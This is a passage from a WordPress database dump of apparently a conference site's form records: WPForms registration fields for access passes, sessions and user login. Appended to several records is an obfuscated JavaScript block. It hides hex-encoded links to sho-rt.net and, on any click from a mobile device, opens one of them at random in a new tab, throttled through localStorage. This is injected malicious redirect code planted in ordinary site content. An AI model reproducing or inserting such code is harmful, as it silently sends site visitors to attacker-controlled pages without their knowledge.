conferences\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"textarea\",\"label\":\"Comments or Questions\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}},\"id\":\"3318\",\"field_id\":9,\"settings\":{\"form_title\":\"conference\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: conference\",\"sender_name\":\"Gsw2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"2\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"form_tags\":[]},\"meta\":{\"template\":\"be32b8cc1eb80419086b4b282acf6d4b\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','conference','','trash','closed','closed','','conference__trashed','','','2023-08-20 22:54:27','2023-08-20 22:54:27','',0,'https://gsw2023.com/?post_type=wpforms&#038;p=3318',0,'wpforms','',0),
(3319,1,'2022-11-12 13:50:53','2022-11-12 13:50:53','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Which access pass would you like to purchase?\",\"choices\":{\"1\":{\"label\":\"Bronze - $199.95\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Silver - $299.95\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Gold - $399.95\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"checkbox\",\"label\":\"Which sessions do you plan on attending?\",\"choices\":{\"1\":{\"label\":\"Session 1\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Session 2\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Session 3\",\"value\":\"\",\"image\":\"\"},\"4\":{\"label\":\"Session 4\",\"value\":\"\",\"image\":\"\"},\"5\":{\"label\":\"Session 5\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"radio\",\"label\":\"Will you be staying overnight?\",\"choices\":{\"1\":{\"label\":\"Yes\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"No\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\",\"choices\":{\"1\":{\"label\":\"I would like to receive email updates regarding future conferences\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"textarea\",\"label\":\"Comments or Questions\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}},\"id\":\"3318\",\"field_id\":8,\"settings\":{\"form_title\":\"conference\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: conference\",\"sender_name\":\"Gsw2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"2\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"form_tags\":[]},\"meta\":{\"template\":\"be32b8cc1eb80419086b4b282acf6d4b\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','conference','','inherit','closed','closed','','3318-revision-v1','','','2022-11-12 13:50:53','2022-11-12 13:50:53','',3318,'https://gsw2023.com/?p=3319',0,'revision','',0),
(3320,1,'2022-11-12 14:43:26','2022-11-12 14:43:26','[[[{\"field_key\":\"user_login\",\"general_setting\":{\"label\":\"Username\",\"field_name\":\"user_login\",\"placeholder\":\"\",\"required\":\"yes\"},\"advance_setting\":{}},{\"field_key\":\"user_pass\",\"general_setting\":{\"label\":\"User Password\",\"field_name\":\"user_pass\",\"placeholder\":\"\",\"required\":\"yes\"},\"advance_setting\":{}}],[{\"field_key\":\"user_email\",\"general_setting\":{\"label\":\"User Email\",\"field_name\":\"user_email\",\"placeholder\":\"\",\"required\":\"yes\"},\"advance_setting\":{}},{\"field_key\":\"user_confirm_password\",\"general_setting\":{\"label\":\"Confirm Password\",\"field_name\":\"user_confirm_password\",\"placeholder\":\"\",\"required\":\"yes\"},\"advance_setting\":{}}]]]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let 